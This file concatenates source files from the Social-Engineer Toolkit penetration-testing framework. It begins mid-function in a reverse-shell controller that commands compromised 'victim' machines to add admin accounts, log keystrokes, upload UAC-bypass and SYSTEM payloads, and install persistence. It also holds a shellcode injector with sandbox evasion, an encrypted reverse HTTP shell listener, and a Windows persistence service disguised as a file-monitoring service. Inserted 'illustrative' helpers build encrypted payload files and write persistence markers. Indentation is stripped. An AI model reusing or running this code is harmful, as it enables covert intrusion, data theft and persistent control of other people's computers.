print("[!] Response back wasn't expected. The session probably died.")
garbage1 = ""
garbage2 = ""
garbage3 = ""
thread.start_new_thread(
call_connections, (d, garbage1, garbage2, garbage3))
sys.exit() # exit_set()
# if data is equal to localadmin then flag and add a local user
# account
if data == "localadmin":
print("[*] Attempting to add a user account with administrative permissions.")
send_packet(data, conn, encryption)
send_packet(creds, conn, encryption)
print("[*] User add completed. Check the system to ensure it worked correctly.")
# if data is equal to domainadmin then flag and add a local
# admin account
if data == "domainadmin":
print("[*] Attempting to add a user account with domain administrative permissions.")
send_packet(data, conn, encryption)
send_packet(creds, conn, encryption)
print("[*] User add completed. Check the system to ensure it worked correctly.")
# keystroke logger
if data == "keystroke_start":
send_packet(data, conn, encryption)
print("[*] Keystroke logger has been started on the victim machine")
# dump the data
if data == "keystroke_dump":
send_packet(data, conn, encryption)
data = conn.recv(1024)
data = decrypt_packet(data, encryption)
data = conn.recv(int(data))
data = decrypt_packet(data, encryption)
print(data)
# if data is equal to download
if data == "download":
# trigger our shell to go in downloadfile mode
data = "downloadfile"
# send that we are in downloadfile mode
send_packet(data, conn, encryption)
# send our file path
send_packet(download_path, conn, encryption)
# mark a flag for write
download_path = download_path.replace("\\", "_")
download_path = download_path.replace("/", "_")
download_path = download_path.replace(":", "_")
filewrite = open(download_path, "wb")
# start a loop until we are finished getting data
# recv data
data = conn.recv(1024)
data = decrypt_packet(data, encryption)
# here is an ugly hack but it works, basically we set two
# counters. MSGLEN which will eventually equal the length
# of what number was sent to us which represented the length
# of the output of the file.
# Dataout will eventually equal the entire string loaded into our
# buffer then sent for decryption.
#
# A loop is started which continues to receive until we hit
# the length of what our entire full encrypted file output
# is equaled. Once that occurs, we are out of our loop and
# the full string is sent to the decryption routine and
# presented back to us.
MSGLEN = 0
dataout = ""
length = int(data)
while MSGLEN != length:
data = conn.recv(1024)
dataout += data
MSGLEN = MSGLEN + len(data)
data = decrypt_packet(data, encryption)
# if the file wasn't right
if data == "File not found.":
print("[!] Filename was not found. Try again.")
break
if data != "File not found.":
# write the data to file
filewrite.write(data)
filewrite.close()
# grab our current path
definepath = os.getcwd()
print("[*] Filename: %s successfully downloaded." % (download_path))
print("[*] File stored at: %s/%s" % (definepath, download_path))
# lock workstation
if data == "lockworkstation":
print("[*] Sending the instruction to lock the victims workstation...")
send_packet(data, conn, encryption)
print("[*] Victims workstation has been locked...")
# grabsystem
if data == "grabsystem":
data = "getsystem"
# send that we want to upload a file to the victim
# controller
send_packet(data, conn, encryption)
time.sleep(0.5)
write_path = "not needed"
send_packet(write_path, conn, encryption)
# specify null variable to store our buffer for our file
data_file = ""
if os.path.isfile("src/payloads/set_payloads/shell.windows"):
upload = "src/payloads/set_payloads/shell.windows"
if os.path.isfile("shell.windows"):
upload = "shell.windows"
if os.path.isfile(upload):
fileopen = open(upload, "rb")
print("[*] Attempting to upload interactive shell to victim machine.")
# open file for reading
data_file = fileopen.read()
fileopen.close()
# send the file line by line to the system
send_packet(data_file, conn, encryption)
# receive length of confirmation
data = conn.recv(1024)
# decrypt the confirmation
data = decrypt_packet(data, encryption)
# now receive confirmation
data = conn.recv(int(data))
# encrypt our confirmation or failed upload
data = decrypt_packet(data, encryption)
# if we were successful
if data == "Confirmed":
print("[*] SET Interactive shell successfully uploaded to victim.")
# if we failed
if data == "Failed":
print("[!] File had an issue saving to the victim machine. Try Again?")
# delay 5 seconds
time.sleep(0.5)
# write out system
if os.path.isfile("%s/system.address" % (userconfigpath)):
os.remove("%s/system.address" % (userconfigpath))
filewrite = open("%s/system.address" % (userconfigpath), "w")
filewrite.write(addr)
filewrite.close()
# send the ipaddress and port for reverse connect back
send_packet(ipaddress, conn, encryption)
print("[*] You should have a new shell spawned that is running as SYSTEM in a few seconds...")
# bypassuac
if data == "bypassuac":
# define uac string
# had to do some funky stuff here because global vars are not working properly
# inside threads, so the information can't be passed to
# normal outside routines
if os.path.isfile(userconfigpath + "uac.address"):
os.remove(userconfigpath + "uac.address")
filewrite = open(userconfigpath + "uac.address", "w")
filewrite.write(addr)
filewrite.close()
# send that we want to upload a file to the victim
# controller
send_packet(data, conn, encryption)
time.sleep(0.5)
# now that we're inside that loop on victim we need to give it parameters
# we will send the write_path to the victim to prep the
# filewrite
write_path = "not needed"
# send packet over
send_packet(write_path, conn, encryption)
# specify null variable to store our buffer for our file
data_file = ""
if exe_platform == "x64":
if os.path.isfile("src/payloads/set_payloads/uac_bypass/x64.binary"):
upload = "src/payloads/set_payloads/uac_bypass/x64.binary"
if os.path.isfile("uac_bypass/x64.binary"):
upload = "uac_bypass/x64.binary"
if exe_platform == "x86":
if os.path.isfile("src/payloads/set_payloads/uac_bypass/x86.binary"):
upload = "src/payloads/set_payloads/uac_bypass/x86.binary"
if os.path.isfile("uac_bypass/x86.binary"):
upload = "uac_bypass/x86.binary"
if os.path.isfile(upload):
fileopen = open(upload, "rb")
print("[*] Attempting to upload UAC bypass to the victim machine.")
# start a loop
data_file = fileopen.read()
fileopen.close()
# send the file line by line to the system
send_packet(data_file, conn, encryption)
# receive length of confirmation
data = conn.recv(1024)
# decrypt the confirmation
data = decrypt_packet(data, encryption)
# now receive confirmation
data = conn.recv(int(data))
# encrypt our confirmation or failed upload
data = decrypt_packet(data, encryption)
# if we were successful
if data == "Confirmed":
print("[*] Initial bypass has been uploaded to victim successfully.")
# if we failed
if data == "Failed":
print("[!] File had an issue saving to the victim machine. Try Again?")
time.sleep(0.5)
# now that we're inside that loop on victim we need to give it parameters
# we will send the write_path to the victim to prep the
# filewrite
send_packet(write_path, conn, encryption)
# specify null variable to store our buffer for our file
data_file = ""
if os.path.isfile("src/payloads/set_payloads/shell.windows"):
upload = "src/payloads/set_payloads/shell.windows"
if os.path.isfile("shell.windows"):
upload = "shell.windows"
if os.path.isfile(upload):
fileopen = open(upload, "rb")
print("[*] Attempting to upload interactive shell to victim machine.")
# start a loop
data_file = fileopen.read()
fileopen.close()
# send the file line by line to the system
send_packet(data_file, conn, encryption)
# receive length of confirmation
data = conn.recv(1024)
# decrypt the confirmation
data = decrypt_packet(data, encryption)
# now receive confirmation
data = conn.recv(int(data))
# encrypt our confirmation or failed upload
data = decrypt_packet(data, encryption)
# if we were successful
if data == "Confirmed":
print("[*] SET Interactive shell successfully uploaded to victim.")
# if we failed
if data == "Failed":
print("[!] File had an issue saving to the victim machine. Try Again?")
send_packet(ipaddress, conn, encryption)
print("[*] You should have a new shell spawned that is UAC safe in a few seconds...")
# remove persistence
if data == "removepersistence":
print("[*] Telling interactive shell to remove persistence from startup.")
send_packet(data, conn, encryption)
print("[*] Service has been scheduled for deletion. It may take a reboot or when the 30 minute loop is finished.")
# persistence
if data == "persistence":
# we place a try except block here, if UAC is enabled
# persistence fails for now
try:
# send that we want to upload a file to the victim
# controller for persistence
send_packet(data, conn, encryption)
time.sleep(0.5)
# now that we're inside that loop on victim we need to give it parameters
# we will send the write_path to the victim to prep the
# filewrite
write_path = "not needed"
# send packet over
send_packet(write_path, conn, encryption)
# specify null variable to store our buffer for our
# file
data_file = ""
if os.path.isfile("src/payloads/set_payloads/persistence.binary"):
if core_modules == True:
subprocess.Popen(
"cp src/payloads/set_payloads/persistence.binary %s" % (userconfigpath), shell=True).wait()
upx("%s/persistence.binary" % (userconfigpath))
upload = "%s/persistence.binary" % (userconfigpath)
if core_modules == False:
upload = "src/payloads/set_payloads/persistence.binary"
if os.path.isfile("persistence.binary"):
upload = "persistence.binary"
if os.path.isfile(upload):
fileopen = open(upload, "rb")
print("[*] Attempting to upload the SET Interactive Service to the victim.")
# start a loop
data_file = fileopen.read()
fileopen.close()
# send the file line by line to the system
send_packet(data_file, conn, encryption)
# receive length of confirmation
data = conn.recv(1024)
# decrypt the confirmation
data = decrypt_packet(data, encryption)
# now receive confirmation
data = conn.recv(int(data))
# encrypt our confirmation or failed upload
data = decrypt_packet(data, encryption)
# if we were successful
if data == "Confirmed":
print("[*] Initial service has been uploaded to victim successfully.")
# if we failed
if data == "Failed":
print("[!] File had an issue saving to the victim machine. Try Again?")
time.sleep(0.5)
# now that we're inside that loop on victim we need to give it parameters
# we will send the write_path to the victim to prep the
# filewrite
send_packet(write_path, conn, encryption)
# specify null variable to store our buffer for our
# file
data_file = ""
if os.path.isfile("src/payloads/set_payloads/shell.windows"):
if core_modules == True:
subprocess.Popen(
"cp src/payloads/set_payloads/shell.windows %s" % (userconfigpath), shell=True).wait()
upx(userconfigpath + "shell.windows")
upload = userconfigpath + "shell.windows"
if core_modules == False:
upload = "src/payloads/set_payloads/shell.windows"
if os.path.isfile("shell.windows"):
upload = "shell.windows"
if os.path.isfile(upload):
fileopen = open(upload, "rb")
print("[*] Attempting to upload SET Interactive Shell to victim machine.")
# start a loop
data_file = fileopen.read()
fileopen.close()
# send the file line by line to the system
send_packet(data_file, conn, encryption)
# receive length of confirmation
data = conn.recv(1024)
# decrypt the confirmation
data = decrypt_packet(data, encryption)
# now receive confirmation
data = conn.recv(int(data))
# encrypt our confirmation or failed upload
data = decrypt_packet(data, encryption)
# if we were successful
if data == "Confirmed":
print("[*] SET Interactive shell successfully uploaded to victim.")
# if we failed
if data == "Failed":
print("[!] File had an issue saving to the victim machine. Try Again?")
send_packet(ipaddress, conn, encryption)
print("[*] Service has been created on the victim machine. You should have a connection back every 30 minutes.")
except Exception:
print("[!] Failed to create service on victim. If UAC is enabled this will fail. Even with bypassUAC.")
# if data is equal to upload
if data == "upload":
# trigger our shell to go in downloadfile mode
data = "uploadfile"
# send that we want to upload a file to the victim
# controller
send_packet(data, conn, encryption)
time.sleep(0.5)
# now that we're inside that loop on victim we need to give it parameters
# we will send the write_path to the victim to prep the
# filewrite
send_packet(write_path, conn, encryption)
# specify null variable to store our buffer for our file
data_file = ""
if os.path.isfile(upload):
fileopen = open(upload, "rb")
print("[*] Attempting to upload %s to %s on victim machine." % (upload, write_path))
# start a loop
data_file = fileopen.read()
fileopen.close()
# send the file line by line to the system
send_packet(data_file, conn, encryption)
# receive length of confirmation
data = conn.recv(1024)
# decrypt the confirmation
data = decrypt_packet(data, encryption)
# now receive confirmation
data = conn.recv(int(data))
# encrypt our confirmation or failed upload
data = decrypt_packet(data, encryption)
# if we were successful
if data == "Confirmed":
print("[*] File has been uploaded to victim under path: " + write_path)
# if we failed
if data == "Failed":
print("[!] File had an issue saving to the victim machine. Try Again?")
# if file wasn't found
else:
print("[!] File wasn't found. Try entering the path again.")
# if data == ssh_port_tunnel
if data == "ssh_tunnel":
# let the server know it needs to switch to paramiko mode
data = "paramiko"
print("[*] Telling the victim machine we are switching to SSH tunnel mode..")
# send encrypted packet to victim
send_packet(data, conn, encryption)
# receive length of confirmation
data = conn.recv(1024)
# decrypt the confirmation
data = decrypt_packet(data, encryption)
# now receive confirmation
data = conn.recv(int(data))
# decrypt packet
data = decrypt_packet(data, encryption)
if data == "Paramiko Confirmed.":
print("[*] Acknowledged the server supports SSH tunneling..")
# send all the data over
data = ssh_server_ip + "," + ssh_server_port_address + "," + ssh_server_tunnel_port + \
"," + ssh_server_username + "," + ssh_server_password + "," + victim_server_port
# encrypt the packet and send it over
send_packet(data, conn, encryption)
print("[*] Tunnel is establishing, check IP Address: " + ssh_server_ip + " on port: " + ssh_server_tunnel_port)
print("[*] As an example if tunneling RDP you would rdesktop localhost 3389")
# list running processes
if data == "ps":
# send encrypted packet to victim
send_packet(data, conn, encryption)
# recv data
data = conn.recv(1024)
data = decrypt_packet(data, encryption)
MSGLEN = 0
dataout = ""
length = int(data)
while MSGLEN != length:
data = conn.recv(1024)
dataout += data
MSGLEN = MSGLEN + len(data)
data = decrypt_packet(dataout, encryption)
print(data)
# reboot server
if data == "reboot now":
data = "reboot"
# send encrypted packet to victim
send_packet(data, conn, encryption)
# recv data
data = conn.recv(1024)
data = decrypt_packet(data, encryption)
MSGLEN = 0
dataout = ""
length = int(data)
while MSGLEN != length:
data = conn.recv(1024)
dataout += data
MSGLEN = MSGLEN + len(data)
data = decrypt_packet(dataout, encryption)
print(data)
# if data is equal to pid kill
if data == "kill":
# send encrypted packet to victim
send_packet(data, conn, encryption)
# send the pid of the packet we want
send_packet(pid_number, conn, encryption)
# wait for confirmation that it was killed
data = conn.recv(1024)
data = decrypt_packet(data, encryption)
print("[*] Process has been killed with PID: " + pid_number)
data = conn.recv(1024)
# if we are executing a command on the local operating system
if data == "exec":
# execute the command via subprocess
proc = subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
# pipe output for stdout and stderr
stdout_value = proc.stdout.read()
stderr_value = proc.stderr.read()
data = stdout_value + stderr_value
print(data)
# if data is equal to shellcode
if data == "shellcode":
# send that we want to use shellcode to execute
send_packet(data, conn, encryption)
time.sleep(0.5)
# send the file line by line to the system
send_packet(shellcode_inject, conn, encryption)
# handle the main exceptions
except Exception as e:
print("[!] Something went wrong printing error: " + str(e))
log(e)
count = 2
garbage1 = ""
garbage2 = ""
garbage3 = ""
thread.start_new_thread(
call_connections, (d, garbage1, garbage2, garbage3))
sys.exit() # exit_set()
if data == "quit" or data == "exit" or data == "back":
count = 2
garbage1 = ""
garbage2 = ""
garbage3 = ""
thread.start_new_thread(
call_connections, (d, garbage1, garbage2, garbage3))
print_status(
"The Social-Engineer Toolkit (SET) is listening on: 0.0.0.0:" + str(PORT))
# define basic dictionary
global d
d = {}
# function for updating dictionary
def update_dict(conn, addr):
# update dictionary
d[conn] = addr[0]
def call_connections(d, garbage1, garbage2, garbage3):
global count
count = 2
counter = 1
if false_shell == False:
# if tab_complete == True:
# completer = Completer2()
# readline.set_completer(completer.complete)
while 1:
try:
print("*** Pick the number of the shell you want ***\n")
for records in d.items():
if records[1] != "127.0.0.1":
print(str(counter) + ": " + records[1])
counter += 1
print("\n")
# allow us to see connections running in the background
choice = input(setprompt("0", ""))
choice = int(choice)
# if our choice is invalid because the user entered a
# higher number than what was listed, we then cycle back
# through the loop
if choice > counter - 1:
print("[!] Invalid choice, please enter a valid number to interact with.")
if choice <= counter - 1:
break
counter = 1
except ValueError:
counter = 1
if choice == "quit" or choice == "exit" or choice == "back":
print_status("Returning back to the main menu.")
break
if len(choice) != 0:
choice = str(choice)
print("[!] Invalid choice, please enter a valid number to interact with.")
if choice == "quit" or choice == "exit" or choice == "back":
choice = 1
sockobj = socket.socket(AF_INET, SOCK_STREAM)
sockobj.connect(('', PORT))
choice = int(choice) - 1
# counter to dictionary
dict_point = 0
for records in d.items():
# pull our socket handle
if choice == dict_point:
# grab socket handler
conn = records[0]
# grab address
addr = records[1]
# needed to unhose address name and to identify if we need to add
# additional flags. This is a temporary workaround, will add a full
# fledge handler of flags soon.
#
# addr = addr.replace(":UAC-Safe", "")
# addr = addr.replace("WINDOWS:SYSTEM", "")
# addr = addr.replace(":POSIX", "")
# addr = addr.replace(":WINDOWS:UAC-SAFE", "")
# addr = addr.replace(":WINDOWS", "")
# call our shell handler
thread.start_new_thread(
handle_connection, (conn, addr, encryption, operating_system))
# increment dict_point until we hit choice
dict_point += 1
try:
while 1:
if tab_complete == True:
completer = Completer2()
readline.set_completer(completer.complete)
# connection and address for victim
conn, addr = mysock.accept()
# bypass counter
bypass_counter = 0
# if for some reason we got something connecting locally just bomb
# out
if addr[0] == "127.0.0.1":
conn.close()
sys.exit() # pass
# here we test to see if the SET shell is really there or someone
# connected to it.
false_shell = False
if addr[0] != "127.0.0.1":
try:
# try to read the identification string sent by the connecting client
data = conn.recv(27)
except Exception as e:
print(e)
false_shell = True
# if it isn't windows
if data != "IHAYYYYYIAMSETANDIAMWINDOWS":
# if it isn't nix
if data != "IHAYYYYYIAMSETANDIAMPOSIXXX":
false_shell = True
# if we have a windows shell
if data == "IHAYYYYYIAMSETANDIAMWINDOWS":
if os.path.isfile(userconfigpath + "system.address"):
fileopen = open(userconfigpath + "system.address", "r")
system = fileopen.read().rstrip()
system = system.replace(":WINDOWS", "")
system = system.replace(":UAC-SAFE", "")
if str(addr[0]) == str(system):
temp_addr = str(addr[0] + ":WINDOWS:SYSTEM")
bypass_counter = 1
if os.path.isfile(userconfigpath + "uac.address"):
fileopen = open(userconfigpath + "uac.address", "r")
uac = fileopen.read().rstrip()
uac = uac.replace(":WINDOWS", "")
if str(addr[0]) == str(uac):
temp_addr = str(addr[0] + ":WINDOWS:UAC-SAFE")
bypass_counter = 1
if bypass_counter != 1:
temp_addr = str(addr[0] + ":WINDOWS")
temp_pid = str(addr[1])
temp_addr = [temp_addr, temp_pid]
update_dict(conn, temp_addr)
operating_system = "windows"
bypass_counter = 1
# if we have a nix shell
if data == "IHAYYYYYIAMSETANDIAMPOSIXXX":
temp_addr = str(addr[0] + ":POSIX")
temp_pid = str(addr[1])
temp_addr = [temp_addr, temp_pid]
update_dict(conn, temp_addr)
operating_system = "posix"
bypass_counter = 1
if bypass_counter == 0:
if addr[0] != "127.0.0.1":
if false_shell == False:
update_dict(conn, addr)
# reset value
# if uac != None:
if os.path.isfile(userconfigpath + "uac.address"):
os.remove(userconfigpath + "uac.address")
bypass_counter = 0
if os.path.isfile(userconfigpath + "system.address"):
os.remove(userconfigpath + "system.address")
bypass_counter = 0
if addr[0] != "127.0.0.1":
if false_shell == False:
print("[*] Connection received from: " + addr[0] + "\n")
# set the counter if we get more threads that are legitimate
if false_shell == False:
count += 1
try:
# the first time we try this we don't want to start anything
# else
if count == 1:
# call our main caller handler
garbage1 = ""
garbage2 = ""
garbage3 = ""
thread.start_new_thread(
call_connections, (d, garbage1, garbage2, garbage3))
except TypeError as e: # except typerrors
log(e)
garbage1 = ""
garbage2 = ""
garbage3 = ""
thread.start_new_thread(
call_connections, (d, garbage1, garbage2, garbage3))
except Exception as e: # handle exceptions
print("[!] Something went wrong. Printing error: " + str(e))
log(e)
garbage1 = ""
garbage2 = ""
garbage3 = ""
thread.start_new_thread(
call_connections, (d, garbage1, garbage2, garbage3))
# handle control-c
except KeyboardInterrupt:
exit_menu()
sys.exit(-1)
# handle all exceptions
except Exception as e:
print_error("Something went wrong: ")
print(bcolors.RED + str(e) + bcolors.ENDC)
count = 2
garbage1 = ""
garbage2 = ""
garbage3 = ""
thread.start_new_thread(
call_connections, (d, garbage1, garbage2, garbage3))
log(e)
sys.exit()
# if we are calling from cli
# if __name__ == '__main__':
start_listener()
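# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the original listener: the wire format used
# by send_packet() above is two AES/base64 blobs -- first the payload length as
# text, then the payload itself. The helper below shows one hedged way the
# receiving side of that framing could look. It assumes a connected socket and
# a Cryptodome AES-ECB cipher built the same way as above (Python 2 style
# string handling, as in the rest of this file); the name recv_framed_message
# is invented here for illustration and is never called by the listener.
# ---------------------------------------------------------------------------
def recv_framed_message(conn, cipher, padding='{'):
    import base64
    # mirror of DecodeAES above: base64 decode, AES decrypt, strip the padding
    decode = lambda blob: cipher.decrypt(base64.b64decode(blob)).rstrip(padding)
    # first blob: the encrypted length of the encoded payload that follows
    length = int(decode(conn.recv(1024)))
    # keep reading until the whole encoded payload has arrived
    buf = ""
    while len(buf) < length:
        chunk = conn.recv(1024)
        if not chunk:
            break
        buf += chunk
    # second blob: the payload itself
    return decode(buf)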
# --- File: src/payloads/set_payloads/multi_pyinjector.py ---
#
# The Social-Engineer Toolkit Multi-PyInjector revised and simplified version.
# Version: 0.4
#
# This will spawn a separate process for each shellcode instance.
#
# Much cleaner and optimized code. No longer needs files and is passed via
# command line.
#
# Incorporates AES 256 Encryption when passing shellcode
import ctypes
import sys
import subprocess
import os
import base64
from Cryptodome.Cipher import AES
import multiprocessing
import threading
# added sandbox evasion here - most sandboxes use only 1 core
if multiprocessing.cpu_count() < 2:
exit()
# define our shellcode injection code through ctypes
def injection(sc):
sc = sc.decode("string_escape")
sc = bytearray(sc)
# Initial awesome code and credit found here:
# http://www.debasish.in/2012_04_01_archive.html
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(sc)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(sc)))
buf = (ctypes.c_char * len(sc)).from_buffer(sc)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(sc)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(
ctypes.c_int(ht), ctypes.c_int(-1))
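# In short, injection() above: asks the kernel for a buffer with VirtualAlloc
# (0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE), pins it
# with VirtualLock, copies the shellcode bytes into it with RtlMoveMemory,
# starts a new thread at that address with CreateThread, and then blocks on
# WaitForSingleObject (-1 = INFINITE) until the shellcode thread finishes.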
if __name__ == '__main__':
multiprocessing.freeze_support()
subprocess.Popen("netsh advfirewall set global StatefulFTP disable",
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# this will be our ultimate filename we use for the shellcode generate
# by the Social-Engineer Toolkit
try:
# our file containing shellcode
if len(sys.argv[1]) > 1:
payload_filename = sys.argv[1]
if os.path.isfile(payload_filename):
fileopen = open(payload_filename, "r")
sc = fileopen.read()
# if we didn't find our shellcode path then exit out
if not os.path.isfile(payload_filename):
sys.exit()
if len(sys.argv[2]) > 1:
# this is our secret key for decrypting the AES encrypted traffic
secret = sys.argv[2]
secret = base64.b64decode(secret)
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
BLOCK_SIZE = 32
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to decrypt a string which will be our shellcode
DecryptAES = lambda c, e: c.decrypt(
base64.b64decode(e)).rstrip(PADDING)
cipher = AES.new(secret, AES.MODE_ECB)
# our decrypted value for shellcode
sc = DecryptAES(cipher, sc)
# split our shellcode into a list
sc = sc.split(",")
# catch an IndexError (missing arguments) and exit
except IndexError:
sys.exit()
jobs = []
for payload in sc:
if payload != "":
p = multiprocessing.Process(target=injection, args=(payload,))
jobs.append(p)
p.start()
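# ---------------------------------------------------------------------------
# Illustrative sketch, not part of this injector: the decryption above expects
# argv[1] to point at a file holding base64(AES-ECB(padded, comma-separated
# shellcode strings)) and argv[2] to hold the base64 of the 32-byte key. The
# helper below shows one hedged way such a payload file could be produced; how
# SET actually builds this blob may differ, and the name build_payload_file is
# invented purely for illustration. Written with the same Python 2 style
# string handling as the rest of this file.
# ---------------------------------------------------------------------------
def build_payload_file(shellcode_list, out_path):
    import base64
    import os
    from Cryptodome.Cipher import AES
    BLOCK_SIZE = 32
    PADDING = '{'
    # the injector splits on "," and spawns one process per entry
    plaintext = ",".join(shellcode_list)
    # pad to a multiple of the AES block length, mirroring the pad lambda above
    plaintext = plaintext + (BLOCK_SIZE - len(plaintext) % BLOCK_SIZE) * PADDING
    secret = os.urandom(BLOCK_SIZE)
    cipher = AES.new(secret, AES.MODE_ECB)
    with open(out_path, "w") as handle:
        handle.write(base64.b64encode(cipher.encrypt(plaintext)))
    # the key is handed to the injector on the command line, base64 encoded
    return base64.b64encode(secret)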
# --- File: src/payloads/set_payloads/set_http_server.py ---
#!/usr/bin/python3
############################################
#
#
# AES Encrypted Reverse HTTP Listener by:
#
# Dave Kennedy (ReL1K)
# https://www.trustedsec.com
#
#
############################################
from http.server import BaseHTTPRequestHandler
from http.server import HTTPServer
import urllib
import re
import os
import base64
from Cryptodome.Cipher import AES
import sys
import time
from src.core.setcore import *
# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
# 32 character secret key - change this if you want to be unique
secret = "(3j^%sh@hd3hDH2u3h@*!~h~2&^lk<!L"
# create a cipher object using the random secret
cipher = AES.new(secret, AES.MODE_ECB)
# url decode for postbacks
def htc(m):
return chr(int(m.group(1), 16))
# url decode
def urldecode(url):
rex = re.compile('%([0-9a-fA-F][0-9a-fA-F])', re.M)
return rex.sub(htc, url)
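# Note on urldecode() above (added for clarity): it only rewrites %XX escape
# sequences; the "+"-for-space convention of form encoding is not handled,
# which is generally fine here because the body being decoded is a
# percent-encoded base64 blob that contains no spaces.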
class GetHandler(BaseHTTPRequestHandler):
# handle get request
def do_GET(self):
# this will be our shell command
message = input("shell> ")
# if we specify quit, then sys arg out of the shell
if message == "quit" or message == "exit":
print ("\nExiting the SET RevShell Listener... ")
time.sleep(2)
sys.exit()
# send a 200 OK response
self.send_response(200)
# end headers
self.end_headers()
# encrypt the message
message = EncodeAES(cipher, message)
# base64 it
message = base64.b64encode(message)
# write our command shell param to victim
self.wfile.write(message)
# return out
return
# handle post request
def do_POST(self):
# send a 200 OK response
self.send_response(200)
# end headers
self.end_headers()
# grab the length of the POST data
length = int(self.headers.get('content-length'))
# read in the length of the POST data
qs = self.rfile.read(length)
# url decode
url = urldecode(qs)
# remove the parameter cmd
url = url.replace("cmd=", "")
# base64 decode
message = base64.b64decode(url)
# decrypt the string
message = DecodeAES(cipher, message)
# display the command back decrypted
print(message)
# if __name__ == '__main__':
try:
# bind to all interfaces
if check_options("PORT=") != 0:
port = check_options("PORT=")
else:
port = 443
server = HTTPServer(('', int(port)), GetHandler)
print("""############################################
#
# The Social-Engineer Toolkit (SET) HTTP RevShell
#
# Dave Kennedy (ReL1K)
# https://www.trustedsec.com
#
############################################""")
print('Starting encrypted web shell server, use <Ctrl-C> to stop')
# simple try block
try:
# serve and listen forever
server.serve_forever()
# handle keyboard interrupts
except KeyboardInterrupt:
print("[!] Exiting the encrypted webserver shell.. hack the gibson.")
except Exception as e:
print("Something went wrong, printing error: " + e)
# --- File: src/payloads/set_payloads/persistence.py ---
#!/usr/bin/python3
#
##########################################################################
#
# Social-Engineer Toolkit Persistence Service
#
# Right now this is a pretty lame attempt at a service but will grow over time. The text file it reads in from isn't
# really a good idea, but it's a start.
#
##########################################################################
#
# ex usage: persistence.exe install, start, stop, remove
#
# You can see output of this program running python site-packages\win32\lib\win32traceutil for debugging
#
##########################################################################
import win32service
import win32serviceutil
import win32event
import win32evtlogutil
import win32traceutil
import servicemanager
import winerror
import time
import sys
import os
import subprocess
class aservice(win32serviceutil.ServiceFramework):
_svc_name_ = "windows_monitoring"
_svc_display_name_ = "Windows File Monitoring Service"
_svc_deps_ = ["EventLog"]
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
self.isAlive = True
def SvcStop(self):
# tell Service Manager we are trying to stop (required)
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
# set the event to call
win32event.SetEvent(self.hWaitStop)
self.isAlive = False
def SvcDoRun(self):
import servicemanager
# wait for being stopped ...
self.timeout = 1000 # In milliseconds (update every second)
while self.isAlive:
# wait for service stop signal, if timeout, loop again
rc = win32event.WaitForSingleObject(self.hWaitStop, self.timeout)
# expand the filesystem path
windir = os.environ['WINDIR']
# grab homepath
homedir_path = os.getenv("SystemDrive")
homedir_path = homedir_path + "\\Program Files\\Common Files\\"
# pull the windows operating system version number
windows_version = sys.getwindowsversion()[2]
# pull integer of version number
windows_version = int(windows_version)
# windows XP and below
if windows_version < 3791:
fileopen = open("%s\\system32\\isjxwqjs" % (windir), "r")
# windows 7, vista, 2008, etc. that might have UAC so we write to
# AppData instead
if windows_version > 3791:
fileopen = open("%s\\isjxwqjs" % (homedir_path), "r")
for line in fileopen:
# pull set-path, this is pulled from interactive shell and
# written when persistence is called
set_path = line.rstrip()
# specify filename to execute the SET interactive shell
subprocess.Popen('%s' % (set_path), shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# sleep 30 mins
time.sleep(1800)
self.ReportServiceStatus(win32service.SERVICE_STOPPED)
return
if __name__ == '__main__':
# if it's called without arguments, run as a service; otherwise handle the install/start/stop/remove command line
if len(sys.argv) == 1:
try:
evtsrc_dll = os.path.abspath(servicemanager.__file__)
servicemanager.PrepareToHostSingle(aservice)
servicemanager.Initialize('aservice', evtsrc_dll)
servicemanager.StartServiceCtrlDispatcher()
except win32service.error as details:
if details[0] == winerror.ERROR_FAILED_SERVICE_CONTROLLER_CONNECT:
win32serviceutil.usage()
else:
win32serviceutil.HandleCommandLine(aservice)
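# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the service: SvcDoRun above re-reads the
# path of the payload to launch from a flat marker file named "isjxwqjs",
# either under %WINDIR%\system32 (pre-Vista builds) or under
# "%SystemDrive%\Program Files\Common Files\" (Vista and later). The helper
# below shows one hedged way that marker could be written; the SET interactive
# shell performs this step itself and may do it differently, and the name
# write_persistence_marker is invented here for illustration.
# ---------------------------------------------------------------------------
def write_persistence_marker(payload_path):
    build_number = int(sys.getwindowsversion()[2])
    if build_number < 3791:
        marker = os.path.join(os.environ['WINDIR'], "system32", "isjxwqjs")
    else:
        marker = os.path.join(os.getenv("SystemDrive") + "\\",
                              "Program Files", "Common Files", "isjxwqjs")
    with open(marker, "w") as handle:
        handle.write(payload_path)
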